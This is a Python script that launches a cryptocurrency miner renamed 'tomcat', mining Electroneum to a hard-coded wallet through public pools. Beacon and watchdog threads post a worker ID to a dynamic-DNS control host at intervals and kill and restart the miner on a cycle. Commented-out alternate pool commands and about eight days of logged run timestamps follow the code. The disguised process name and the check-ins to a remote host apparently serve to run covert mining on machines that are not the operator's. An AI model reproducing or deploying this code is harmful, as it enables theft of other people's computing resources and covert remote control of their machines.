import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:11:04.705284
#2018-02-17 16:59:05.789996
#2018-02-17 18:48:06.487025
#2018-02-17 20:33:03.389389
#2018-02-17 22:19:07.221885
#2018-02-18 00:03:06.704952
#2018-02-18 01:54:07.491566
#2018-02-18 03:42:06.623661
#2018-02-18 05:29:01.879038
#2018-02-18 07:20:07.422223
#2018-02-18 09:08:07.185695
#2018-02-18 10:54:05.827014
#2018-02-18 12:40:08.034086
#2018-02-18 14:27:02.058031
#2018-02-18 16:17:06.940781
#2018-02-18 18:06:07.299750
#2018-02-18 19:52:01.359685
#2018-02-18 21:38:08.078822
#2018-02-18 23:26:04.002668
#2018-02-19 01:13:03.488947
#2018-02-19 02:59:04.333401
#2018-02-19 04:46:06.102549
#2018-02-19 06:29:01.919842
#2018-02-19 08:19:05.935891
#2018-02-19 10:08:05.632295
#2018-02-19 11:57:05.008936
#2018-02-19 13:45:10.456590
#2018-02-19 15:34:08.424795
#2018-02-19 17:21:09.227974
#2018-02-19 19:09:01.776054
#2018-02-19 20:57:03.967891
#2018-02-19 22:45:06.814493
#2018-02-20 00:29:04.464599
#2018-02-20 02:18:05.789854
#2018-02-20 04:10:06.768138
#2018-02-20 05:53:07.093788
#2018-02-20 07:40:09.399260
#2018-02-20 09:25:08.510980
#2018-02-20 11:09:08.448895
#2018-02-20 12:56:04.618952
#2018-02-20 14:42:02.119400
#2018-02-20 16:28:10.467205
#2018-02-20 18:17:07.103974
#2018-02-20 20:07:07.304169
#2018-02-20 21:54:06.701935
#2018-02-20 23:35:05.028606
#2018-02-21 01:20:06.338717
#2018-02-21 03:08:04.856708
#2018-02-21 04:58:04.137085
#2018-02-21 06:46:06.519690
#2018-02-21 08:34:07.502683
#2018-02-21 10:20:07.996182
#2018-02-21 12:09:01.924570
#2018-02-21 13:58:06.529968
#2018-02-21 15:43:09.831973
#2018-02-21 17:35:09.812893
#2018-02-21 19:22:08.760759
#2018-02-21 21:10:09.536374
#2018-02-21 22:57:06.887619
#2018-02-22 00:47:05.491260
#2018-02-22 02:36:08.234643
#2018-02-22 04:22:04.107341
#2018-02-22 06:08:03.992452
#2018-02-22 07:53:01.460054
#2018-02-22 09:41:04.494665
#2018-02-22 11:26:01.615590
#2018-02-22 13:13:05.788554
#2018-02-22 15:03:03.200964
#2018-02-22 16:46:04.362912
#2018-02-22 18:33:10.463330
#2018-02-22 20:26:07.824497
#2018-02-22 22:11:05.558241
#2018-02-22 23:57:05.733204
#2018-02-23 01:46:01.812821
#2018-02-23 03:36:07.415577
#2018-02-23 05:20:08.176534
#2018-02-23 07:05:01.564904
#2018-02-23 08:53:06.174252
#2018-02-23 11:12:07.357082
#2018-02-23 13:05:10.490247
#2018-02-23 14:50:13.177740
#2018-02-23 16:40:07.581956
#2018-02-23 18:26:10.114669
#2018-02-23 20:11:05.889037
#2018-02-23 22:02:06.103215
#2018-02-23 23:52:05.731131
#2018-02-24 01:43:01.528377
#2018-02-24 03:35:04.875469
#2018-02-24 05:19:04.666381
#2018-02-24 07:08:02.001889
#2018-02-24 08:55:02.900646
#2018-02-24 10:56:03.387001
#2018-02-24 12:44:04.581500
#2018-02-24 14:33:05.435923
#2018-02-24 16:19:07.043970
#2018-02-24 18:13:04.925452
#2018-02-24 19:59:01.813385
#2018-02-24 21:43:04.356690
#2018-02-25 00:39:03.661955
#2018-02-25 04:21:06.856564
#2018-02-25 07:52:04.954641